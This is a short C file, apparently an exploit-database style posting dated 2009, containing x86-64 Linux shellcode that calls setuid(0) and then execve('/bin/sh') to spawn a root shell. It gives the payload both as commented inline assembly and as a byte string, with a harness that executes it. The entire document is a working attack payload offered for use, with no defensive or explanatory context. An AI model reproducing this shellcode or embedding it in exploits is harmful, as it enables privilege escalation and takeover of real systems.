/* setuid(0) + execve(/bin/sh) - just 4 fun. xi4oyu [at] 80sec.com main(){ __asm( "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "push %rbx; \n\t" "movq %rsp,%rdi; \n\t" "xorq %rax,%rax; \n\t" "pushq %rax; \n\t" "pushq %rdi; \n\t" "movq %rsp,%rsi; \n\t" "mov $0x3b,%al; \n\t" "syscall ; \n\t" "pushq $0x1 ; \n\t" "pop %rdi ; \n\t" "pushq $0x3c ; \n\t" "pop %rax ; \n\t" "syscall ; \n\t" ); } */ main() { char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" "\x58\x0f\x05"; (*(void (*)()) shellcode)(); } 2009-05-14 evil.xi4oyu